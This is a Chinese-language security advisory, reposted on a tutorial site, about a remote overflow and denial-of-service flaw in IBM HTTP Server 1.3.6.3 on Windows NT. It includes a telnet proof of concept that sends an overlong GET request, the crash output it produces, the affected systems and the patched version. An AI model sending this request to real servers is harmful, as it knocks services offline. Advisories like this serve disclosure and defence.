明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

IBM HTTP Server 遠(yuǎn)程溢出漏洞 

[摘要]涉及程序: GET 描述: 通過(guò)提交超長(zhǎng)的GET請(qǐng)求導(dǎo)致IBM HTTP Server遠(yuǎn)程溢出詳細(xì): IBM 的 HTTP 服務(wù)器是一個(gè) web 服務(wù)器。在 Windows NT 使用的版本中存在拒絕服務(wù)的漏洞。如果提交一個(gè)超過(guò)219個(gè)字符的 GET 請(qǐng)求,將導(dǎo)致服務(wù)器停止響應(yīng),并報(bào)錯(cuò)。要恢復(fù)服務(wù)...
涉及程序:
GET

描述:
通過(guò)提交超長(zhǎng)的GET請(qǐng)求導(dǎo)致IBM HTTP Server遠(yuǎn)程溢出


詳細(xì):
IBM 的 HTTP 服務(wù)器是一個(gè) web 服務(wù)器。在 Windows NT 使用的版本中存在拒絕服務(wù)的漏洞。

如果提交一個(gè)超過(guò)219個(gè)字符的 GET 請(qǐng)求,將導(dǎo)致服務(wù)器停止響應(yīng),并報(bào)錯(cuò)。要恢復(fù)服務(wù)正常工作需要重新啟動(dòng)應(yīng)用程序。成功的利用該漏洞,攻擊者可在受害的主機(jī)上執(zhí)行任何代碼。(但這還未得到完全證實(shí)。)


以下代碼僅僅用來(lái)測(cè)試和研究這個(gè)漏洞,如果您將其用于不正當(dāng)?shù)耐緩秸?qǐng)后果自負(fù)


$ telnet target 80
GET /......(216個(gè)".")aaa HTTP/1.0

則系統(tǒng)會(huì)報(bào)告下列錯(cuò)誤信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目標(biāo)主機(jī)運(yùn)行在Windows 2000下。

受影響的系統(tǒng)
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun Solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM AIX 4.2.1
- Caldera OpenLinux 2.2

解決方案:
IBM 已經(jīng)在 1.3.12 版本中解決了此問(wèn)題,下載地址:
http://www-4.ibm.com/software/webservers/httpservers/download.html